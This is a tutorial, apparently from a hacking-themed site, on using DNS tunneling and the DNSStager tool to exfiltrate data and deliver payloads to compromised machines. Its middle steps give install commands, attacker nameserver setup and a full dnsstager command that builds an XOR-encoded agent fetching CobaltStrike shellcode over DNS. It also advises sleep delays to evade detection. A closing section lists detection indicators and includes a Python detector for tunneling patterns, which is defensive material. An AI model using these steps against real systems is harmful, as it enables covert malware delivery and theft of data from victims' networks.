Tutorial: How to exfiltrate or execute files in compromised machines with DNS Complete Guide by Blackhat Pakistan 2023
Today we will learn how to exfiltrate or execute files in compromised machines with DNS.
Criminals are constantly changing their modus operandi and using different strategies and ways to compromise their targets and exfiltrate data from internal networks, even in the most delicate situations. For example, TCP traffic is blocked by default in a network, and communication between a malicious agent installed on a specific target and its C2 server isn't possible. In those kinds of scenarios, using other network protocols like ICMP and DNS could be the perfect vehicle to negotiate the hard task of transferring internal information over the walls.
What is DNS protocol
The DNS protocol is increasingly being used as a pathway for data exfiltration, even by infected devices previously infected by threat actors during their malicious activities. DNS tunneling involves transferring the network traffic via DNS port 53, which is frequently inspected and flagged by network firewalls, even next-generation ones.
Malicious software can use specially crafted requests to take advantage of the DNS protocol and send only well-defined chunks in the middle of potentially legitimate DNS traffic. Figure 1 below shows how basic data about a target machine could be transferred between the internal agent and its C2 server available on the internet.
As presented above, the sensitive data can be added in the middle of a request, in raw format (1 and 2), or even using a hexadecimal encoder (3), the best way to avoid potentially non-accepted characters.
In general, the range of data stolen by criminals may include:
- Personally identifiable information (PII) such as basic details, credit card, social security numbers and so on.
- Regulated data related to Payment Card Industry Data Security Standard (PCI DSS) and Health Insurance Portability and Accountability Act (HIPAA) compliance.
- Intellectual property that gives an organization or criminals a competitive advantage.
- Other sensitive information, including non-public information, documents, contracts, company financials, payroll information, emails and every critical secret.
Data encryption malware is an excellent scenario to introduce the subject. As the method used by criminals during ransomware attacks has changed, they are now using the stolen data to put the victims on alert, publishing the secrets on dark web forums to force the victims to pay the ransom. Criminals exfiltrate the data before encrypting all the data.
However, the exfiltration of data from internal networks is frequently seen as a big challenge, as security products block TCP traffic. At this point, the DNS protocol can be abused to communicate with the Internet when outbound TCP traffic isn't possible by default.
DNSStager is an open-source tool used to hide a malicious payload over DNS, retrieve it via multiple DNS records such as IPv6 and TXT, and inject the full payload into memory. Instead of only carrying data from the internal network, we can create a strong connection like a C2 server to execute second-stage payloads on the target machine.
In short, DNSStager creates a malicious DNS server that resolves fake requests to AAAA and TXT records. These requests are a chunk of the payload (fully encoded and encrypted) and ready to be used by the DNSStager agent. This tool can generate C or GoLang agents, a configuration defined before starting the lab.
Figure 2 shows how DNSStager works and how the server resolves a request.
In detail, the "client.exe" file illustrated in Figure 2 above is the DNSStager agent created and dropped on the target machine. DNSStager encodes the malicious payload, splits it into chunks, and makes it ready to resolve via the "client.exe" agent (C or GoLang, depending on the nature of the desired scenario).
After receiving all the information via the DNS protocol and avoiding network barriers, the agent will inject the final payload into memory and execute the shellcode that implements process/memory injection techniques.
To start this journey, we're providing below the essential steps to conduct this lab with success.
1. DNSStager installation and execution
To install DNSStager, it’s necessary to clone it first from the official repository using the following command, install it, and execute it.
git clone https://github.com/mhaskar/DNSStager
pip3 install -r requirements.txt
apt install mingw-w64
2. Configuring the DNS server
The first step is pointing the domain to the DNSStager IP address to resolve and handle any DNS request correctly.
For example, controlling a domain called "mydnsserver.live", we can create a subdomain called "test.mydnsserver.live" and make mydnsserver.live the "NS" (name server) of test.mydnsserver.live after running DNSStager on mydnsserver.live.
As observed in Figure 4, any request coming to the domain test.mydnsserver.live will be handled by mydnsserver.live, which is the DNSStager instance that we are running.
3. DNSStager options
DNSStager is equipped with a lot of functionality.
The "--domain" option is used to select the primary domain used to handle the DNS requests, in this case, "test.mydnsserver.live". Also, as a way of bypassing firewalls, the "--prefix" option can be used to add a prefix such as "cdn". Some examples are presented below.
The other options are described below:
- --payload: the DNSStager payload "agent" generated.
- --output: output path to save the DNSStager executable payload "agent".
- --shellcode_path: the raw/bin shellcode path.
- --xorkey: XOR key to encode the payload with.
- --sleep: used to sleep for N seconds between each DNS request.
In addition, the available payloads can be checked by using the flag "--payloads".
4. Generate the payload/agent
DNSStager encodes the payload using an XOR encoder/encrypter. The XOR key can be specified by using the option "--xorkey".
The complete command can be observed here:
sudo ./dnsstager.py --domain test.mydnsserver.live --payload x64/c/ipv6 --output /tmp/a2.exe --prefix cloud-srv- --shellcode_path ~/payload.bin --sleep 1 --xorkey 0x10
In addition, a sleep time between each request can be added using the option "--sleep", a way of evading detection.
5. DNSStager with CobaltStrike beacons
The shellcode used in this scenario can be a CobaltStrike beacon to take advantage of the range of features provided by this red teaming suite.
Also, instead of using the available DNSStager payloads, we can create the CobaltStrike payload as demonstrated in Figure 8.
So, from this point, we need to create the agent using the same command provided above, but this time indicating the path of the payload generated via CobaltStrike.
6. Executing the agent
At this moment, we can execute the agent on the target machine, in this case, a Windows Server 2019.
After executing the agent with the CobaltStrike beacon inside, we can see the DNS traffic generated between the target machine and the DNSStager server. In detail, a total of 59 DNS AAAA requests were sent to retrieve the final payload. From the security point of view, we can also add some sleep between each request to make this kind of activity less noisy.
DNS protocol and how criminals use it
The DNS protocol proves to be a powerful channel abused by criminals in challenging scenarios because it can get past barriers when no TCP traffic is allowed by default. In this sense, DNS tunneling can be used in a customized way like a C2 infrastructure to perform malicious activities.
The DNS protocol is a good choice for data exfiltration scenarios and payload execution. According to CheckPoint, some indicators should be taken into account to detect DNS tunneling, namely:
- Monitoring domain requests: the requests sent during malicious scenarios are encoded with a request name like DATA_HERE.baddomain.com. So, inspecting requests and telling legitimate traffic from bad traffic is a good way of preventing scenarios of this nature.
- Use of unusual domains: DNS tunneling works based on DNS names. So, if a high volume of requests is observed to an uncommon domain name, that behavior should produce an alert.
- High DNS traffic volume: a spike in DNS traffic can be an accurate indicator of DNS tunneling. Because each DNS request has a maximum size of 253 characters, transferring a large payload over DNS needs many DNS requests, resulting in abnormal behavior.
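The three indicators above can be combined into one check over resolver query logs. The following Python is an added example, not code from the original article or from CheckPoint; the log format, thresholds, allowlist and function names are assumptions, and the sample lines are constructed, modelled on the lab's 59 AAAA requests and the DATA_HERE.baddomain.com pattern.

```python
from collections import defaultdict

# Constructed sample resolver log: "<client> <qtype> <qname>" (not real traffic).
def sample_log():
    lines = [f"10.0.0.5 AAAA cloud-srv-{i}.test.mydnsserver.live" for i in range(59)]
    lines += ["10.0.0.7 TXT " + f"host-info-{i:04d}".encode().hex() + ".baddomain.com"
              for i in range(30)]
    lines += ["10.0.0.9 A www.example.com"] * 40   # allowlisted, repeated name
    lines += ["10.0.0.9 A api.example.net"] * 25   # busy, but always the same name
    lines += ["10.0.0.9 A blog.example.org"] * 3   # uncommon, but low volume
    return lines

def split_name(qname, levels=2):
    """Return (subdomain part, parent domain). Naive: keeps the last `levels`
    labels; production code should use the Public Suffix List."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[:-levels]), ".".join(labels[-levels:])

def find_tunnel_candidates(lines, common_domains, min_queries=20,
                           min_unique_ratio=0.9, long_label=24):
    groups = defaultdict(list)  # (client, parent domain) -> subdomain parts seen
    for line in lines:
        client, _qtype, qname = line.split()
        sub, parent = split_name(qname)
        groups[(client, parent)].append(sub)
    findings = {}
    for (client, parent), subs in groups.items():
        if parent in common_domains:         # unusual domains only
            continue
        if len(subs) < min_queries:          # high request volume to one domain
            continue
        unique_ratio = len(set(subs)) / len(subs)
        if unique_ratio < min_unique_ratio:  # data-bearing names change per query
            continue
        reasons = [f"{len(subs)} queries", f"{unique_ratio:.0%} unique names"]
        if sum(map(len, subs)) / len(subs) >= long_label:
            reasons.append("long encoded-looking labels")
        findings[(client, parent)] = reasons
    return findings

if __name__ == "__main__":
    for key, reasons in find_tunnel_candidates(sample_log(), {"example.com"}).items():
        print(key, reasons)
```

The staged-payload pattern uses short, sequential names, so it is caught by volume and name uniqueness rather than label length; a sleep between requests lowers the rate, which is why the count should be taken over a long window.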
And last but not least, monitoring all the network traffic such as TCP, DNS, ICMP or even the most exotic protocols can give you a real chance of detecting these kinds of abuses early. So, let's take this subject seriously.
Sources
- DNSStager, GitHub
- DNS exfiltration, Akamai
- Data exfiltration and DNS, Infoblox
- DNS tunneling, CheckPoint